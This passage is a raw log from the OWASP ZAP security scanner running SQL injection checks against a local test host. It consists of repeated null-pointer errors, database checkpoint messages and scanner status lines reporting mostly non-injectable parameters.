org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 7314279 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7319486 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7324694 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7329288 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7334503 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7344896 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7354726 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7359923 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7360489 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7375127 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7380526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7385540 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7390137 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7400952 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7410170 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7422374 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7462411 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7462412 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7482616 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7482627 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7498225 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7502834 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7517850 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7518457 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7522861 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7528069 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7538882 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7548287 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7553487 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7554078 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7568692 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7574102 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7579305 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7583702 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7594511 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7603935 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7610327 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7619131 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7624144 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7630351 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7644359 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7649565 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7650769 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7654770 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7665968 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7669974 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7680980 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7685991 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7689993 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7701196 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7710214 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7717212 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7730432 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7732222 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7735630 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7752252 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7756058 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7757450 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7762655 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7771251 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7777859 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7782869 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7791273 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7798073 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7806680 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7818300 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7832328 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7872353 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7872358 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7892568 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7892570 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7909774 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7912785 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7927986 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7929798 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7932998 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7950014 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7953426 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7955217 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7960423 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7968618 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7980633 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7983636 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7995839 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 7998843 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8000853 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8019062 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8020472 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8035482 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8039080 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8040493 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8045900 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8059106 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8064314 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8066116 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8079518 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8081318 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8086530 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8099542 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8101735 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8114743 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8121763 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8133845 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionMySQL in 954.998s 8133845 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionHypersonic strength LOW threshold MEDIUM 8286659 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionHypersonic in 152.814s 8286659 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionOracle strength LOW threshold MEDIUM 8433279 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionOracle in 146.62s 8433279 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionPostgresql strength LOW threshold MEDIUM 8475939 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8475940 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8475951 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8476887 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8476889 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8590043 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionPostgresql in 156.764s 8590043 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionPlugin strength LOW threshold MEDIUM 8591205 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8591273 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8591541 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8591710 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8592533 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8592767 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8593384 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8594793 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8595103 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8595328 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8595717 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8595991 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8596453 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8596604 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8597286 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8597302 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8598107 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8598206 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8598983 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8599123 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8599513 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8599672 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8600219 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8600277 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8601105 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8601142 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8601743 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8601746 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8602343 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8602362 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8603101 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8603166 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8603992 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8604089 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8604483 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8604765 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8605151 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8605365 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8605713 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8605883 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8606133 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8606134 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8606139 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8606764 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8606767 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8607135 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8607162 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8607837 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8607859 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8608441 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8608473 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8609649 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8609699 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8610134 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8610334 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8610806 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8611032 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8611399 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8611608 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8612006 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8612187 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8612748 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8612910 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8613291 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8613600 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8613807 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8613889 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8613903 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 99 column in query 8614511 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8614520 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 9 column in query 8614547 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8614575 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 99 column in query 8614667 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8615294 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8615302 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 9 column in query 8615396 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8615577 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 999 column in query 8615583 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8616158 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8616740 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8617554 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8618230 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8619198 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8619839 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8620335 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8621023 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8621449 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8621846 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8622404 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8622890 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8623397 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8623934 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8624277 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8624664 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8625137 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8625137 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8625142 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8625441 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8625443 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8625665 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8626201 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8626873 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8627424 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8627907 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8628300 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8628722 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8629055 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8629653 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 